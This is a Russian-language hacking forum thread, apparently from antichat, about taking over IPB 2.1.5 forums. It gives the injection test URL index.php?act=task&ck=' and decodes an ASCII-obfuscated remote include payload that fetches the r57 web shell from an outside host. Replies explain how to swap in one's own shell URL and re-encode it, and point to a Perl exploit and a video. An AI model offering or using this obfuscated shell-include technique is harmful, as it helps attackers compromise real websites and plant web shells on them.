![]() |
Проблема с шеллом rst
Смотрел видео..типо как получить админку в IPB 2.1.5
без использования сплойта. Всё зделал как было написано (проверил на уязвимость index.php?act=task&ck=' ) Регюсь..логинюсь на форуме...создаю тему.. Содержание темы Цитата:
Что можно зделать? Как "перекодировать" ссылку (ведь она мертва) на СВОЙ шелл.. Жду помощи. |
Ну ты кнешн в нужном месте создал тему.
https://forum.antichat.ru/showpost.php?p=437257&postcount=11 |
Обисняю. тут ASCII коды символов. Если это расшифровать то будет так:
include "http://rst.void.ru/download/r57shell.txt";/* Тебе нужно изменить адрес ссылки и снова загнать в ASCII коды, можешь посмотреть соответствия по таблице или написать программку, это дело 5 минут :). З.Ы. RST рулез, жаль что закрылись :(. |
Можно видео по юзанью? А то я чёт ничего не понял..
И ещё...посмотрите вот это видео.. по поводу этого шелла. http://pro-hack.ru/download/video/files/Video_ipb.rar |
Видео по юзанью чего? КАк загонять в ASCII или сплоит ссылку на который дал +toxa+?))) Думаю что про сплоит, короче он перле, ставишь на машину ActivePERL и ноу проблем, в сплоите кстати есть комментарии и довольно подробные по юзанью. а теску ты и правда сунул малясь нетуда.
|
Цитата:
|
Цитата:
PHP код:
зы: в асю уже написали.. по поводу массива - конечно, можно и без него, просто у меня немного другие планы появились, пока писал скрипт) |
| Время: 10:41 |